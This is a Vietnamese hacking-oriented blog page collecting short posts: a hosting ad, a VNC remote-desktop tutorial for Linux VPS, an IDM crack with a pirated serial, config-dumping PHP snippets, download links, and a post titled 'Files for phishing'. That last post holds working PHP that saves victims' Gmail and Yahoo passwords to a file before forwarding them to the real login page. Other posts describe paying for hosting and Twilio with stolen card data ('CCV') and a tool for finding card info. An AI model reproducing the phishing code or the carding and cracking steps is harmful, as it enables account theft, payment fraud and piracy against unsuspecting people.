Trang

Hosting - Reseller Active liền

http://greenhostit.com

CCV Socks VN => qua gate active liền
mình toàn chơi = ip việt nam! tốc độ host ở đây cực ổn luôn! chạy vbb,xenforo thì trùm cmnr! chống ddos tốt nữa! nói chung là ngang gator
và cũng là 1 dạng server đặt cùng chỗ với gator 184

Xem Thêm

 

[TUT] - Remote Desktop cho VPS Linux

Đầu tiên login vào SSH nhé ( khuyên dùng Tunnelier nhé )

Bước 1 : Cài X Windows System (KDE và GNOME Desktop Environement !)

Code:

yum groupinstall "X Window System" "GNOME Desktop Environment"

Đến đoạn nó hỏi Y/n cứ Y rồi ngồi đợi xíu

Chờ xíu nó Complete là được.

Sau khi cài đặt xong GNOME Desktop Environnement,chúng ta chuyển qua KDE chạy lệnh :

Code:

yum groupinstall "X Window System" "KDE (K Desktop Environment)"

Đến đoạn nó hỏi Y/n cứ Y rồi ngồi đợi xíu

Bước 2 : Cài đặt VNC Server :

Code:

yum install vnc-server

Đợi xíu cài xong nó sẽ báo

Bước 3 : Chỉnh config của VNC Server

Edit file vnc server, chạy lệnh :

Code:

vi /etc/sysconfig/vncservers

Nếu ai biết sử dụng Linux rồi thì ko nói , còn ai ko biết thì mở SFTP của tunnelier lên,download file đó về,mở = notepad++ , xong edit : Bỏ 2 dấu # ở 2 câu cuối cùng

Code:

# The VNCSERVERS variable is a list of display:user pairs.
#
# Uncomment the lines below to start a VNC server on display :2
# as my 'myusername' (adjust this to your own). You will also
# need to set a VNC password; run 'man vncpasswd' to see how
# to do that.
#
# DO NOT RUN THIS SERVICE if your local area network is
# untrusted! For a secure way of using VNC, see
# <URL:http://www.uk.research.att.com/archive/vnc/sshvnc.html>.

# Use "-nolisten tcp" to prevent X connections to your VNC server via TCP.

# Use "-nohttpd" to prevent web-based VNC clients connecting.

# Use "-localhost" to prevent remote VNC clients connecting except when
# doing so through a secure tunnel. See the "-via" option in the
# `man vncviewer' manual page.

VNCSERVERS="1:root"
VNCSERVERARGS[1]="-geometry 1024x768"

Save lại rồi up đè lên file cũ trên server

Bước 4 : Khởi động VNC Server :

Code:

vncserver

Chạy cái này nó sẽ kiu đặt pass khi vào remote desktop.
Lưu ý: linux khi nhập pass nó sẽ ko ra dấu *** như windows mà nó ẩn xuống,nên các bạn cứ nhập xong bấm enter rồi verify lại 1 lần nữa

Bước 4 : Sửa file xstartup

Code:

vi /root/.vnc/xstartup

Bỏ 2 dấu thăngs ở 2 đoạn như code dưới :

Code:

unset SESSION_MANAGER
exec /etc/X11/xinit/xinitrc

Còn đây là đoạn code đúng luôn,ai ko biết sửa thì copy cái này vào

Code:

#!/bin/sh

# Uncomment the following two lines for normal desktop:
unset SESSION_MANAGER
exec /etc/X11/xinit/xinitrc

[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup
[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources
xsetroot -solid grey
vncconfig -iconic &
xterm -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" &
twm &

Bước 5 : Khởi động lại vnc server :

Code:

/etc/init.d/vncserver restart

Bước 6 : Khởi động khi bật máy:

Code:

chkconfig vncserver on

Bước 7 : Tắt firewall

Code:

/etc/init.d/iptables stop

Bước 8 : Tắt firewall khi bật máy

Code:

chkconfig iptables off

Xong download file này về chạy theo dạng:

Code:
http://www.mediafire.com/?c56submfwizyhbl

Code:
IPserver:1



Xem Thêm

 

Share tool Find Info mới

Dùng để tìm info ccnon


http://www.mediafire.com/?cfbs0cqnd11a6oc

Xem Thêm

 

Source Fake call and SMS

Download code
http://openvbx.org/download
cài đặt bình thường

vào đây reg 1 tài khoản
https://www.twilio.com/try-twilio
CCV + fake sock đủ tiền là qua 
Mới đầu reg thì nó free cho 30$ nhưng anh em cứ add thêm 50$ xài chơi.
Buy ít Phone in.

Xem Thêm

 

Bẻ Crack idm cực kì đơn giản. Mọi phiên bản

Tắt idm.
Vào đây C:\Windows\System32\drivers\etc.
Chon "hosts" mở bằng notepad.
Copy cái này vào cuố


127.0.0.1 localhost
::1 localhost
127.0.0.1 tonec.com
127.0.0.1 www.tonec.com
127.0.0.1 registeridm.com
127.0.0.1 www.registeridm.com
127.0.0.1 secure.registeridm.com
127.0.0.1 internetdownloadmanager.com
127.0.0.1 www.internetdownloadmanager.com
127.0.0.1 secure.internetdownloadmanager.com
127.0.0.1 mirror.internetdownloadmanager.com
127.0.0.1 mirror2.internetdownloadmanager.com
127.0.0.1 mirror3.internetdownloadmanager.com
 Mở IDM lên.
Nhập đầy đủ thông tin.
Serial:
QQFKP-GIYQM-UCIJI-655YR
Mọi bản IDM đều xài được đó nha.

Xem Thêm

 

Code - View File Config Zend (Not dezend )

<?
include 'includes/config.php';
echo $config['Database']['dbname'];
echo "<br>";
echo $config['MasterServer']['username'];
echo "<br>";
echo $config['MasterServer']['password'];
?>
 2.
<?php include('xxx.php'); print_r($GLOBALS); ?> 

Xem Thêm

 

DDOS Flash Collection

Xem Thêm

 

Bachkhoa-npower.vn Coder

  • Download
  • http://www.mediafire.com/?vye7v76du9rsy7o
    http://www.mediafire.com/?pd7ehktl335am2q

Xem Thêm

 

Code tuyển dụng Đẹp


Source+data
http://www.mediafire.com/?bva8uaav4wzx78b

Xem Thêm

 

Thietkewebsitebanhang.net Code



+code
http://www.mediafire.com/?i0bi6cmgu3bolij
+data
http://www.mediafire.com/?fbl58b6v2leic04#1

Xem Thêm

 

Files for phishing

<?php
//=====================================================================
//HY VONG BAN TON TRONG TAC GIA KHI SU DUNG CODE NAY
//Coded by tmt
//Email: tmt@dr.com
//=====================================================================
$file="info.txt";
$acc="\nTai Khoan: Yahoo Mail \n";
if ($_POST['type_mail']=="gmail")
   $acc="\nTai Khoan: Gmail \n";
$str="{$acc} Username:  {$_POST['txtuser']} \n Password:  {$_POST['txtpass']} \n";
 $openlog = fopen ($file, "a");
     fwrite ($openlog,  $str);
     fclose ($openlog);
 ?>
<form action="https://www.google.com/accounts/ServiceLoginAuth" method="post" name=gmail>
<input type="hidden" name="continue" value="http://gmail.google.com/gmail?ui=html&amp;zy=l">
<input type="hidden" name="service" value="mail">
<table cellpadding="1" cellspacing="0" border="0">
<input type="hidden" name="Email" value=<?php echo $_POST['txtuser'];  ?> size="18">
<input type="hidden" name="Passwd" value=<?php echo $_POST['txtpass'];  ?> size="18">
</form>

<form method="post" action="https://login.yahoo.com/config/login?" name="yahoo">
<input type="hidden" name=".tries" value="1">
<input type="hidden" name=".src" value="ym">
<input type="hidden" name=".md5" value="">
<input type="hidden" name=".hash" value="">
<input type="hidden" name=".js" value="">
<input type="hidden" name=".last" value="">
<input type="hidden" name="promo" value="">
<input type="hidden" name=".intl" value="us">
<input type="hidden" name=".bypass" value="">
<input type="hidden" name=".partner" value="">
<input type="hidden" name=".u" value="f9cou892e9t9d">
<input type="hidden" name=".v" value="0">
<input type="hidden" name=".challenge" value="RPXrIXOIaWcZDEgI47MEIOiH3Vxa">
<input type="hidden" name=".yplus" value="">
<input type="hidden" name=".emailCode" value="">
<input type="hidden" name="pkg" value="">
<input type="hidden" name="stepid" value="">
<input type="hidden" name=".ev" value="">
<input type="hidden" name="hasMsgr" value="0">
<input type="hidden" name=".chkP" value="Y">
<input type="hidden" name=".done" value="http://mail.yahoo.com">
<input type="hidden" name=".pd" value="ym_ver%3d0">
<input name="login" id="username" value=<?php echo $_POST['txtuser'];  ?> size="17" type="hidden">
<input name="passwd" id="passwd" value=<?php echo $_POST['txtpass'];  ?> size="17" type="hidden">
</form>

<?php
echo "<script language=javascript>";
if ($_POST['type_mail']=="gmail")
   echo "document.all('gmail').submit()";
else
   echo "document.all('yahoo').submit()";
echo "</script>";
?>

Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương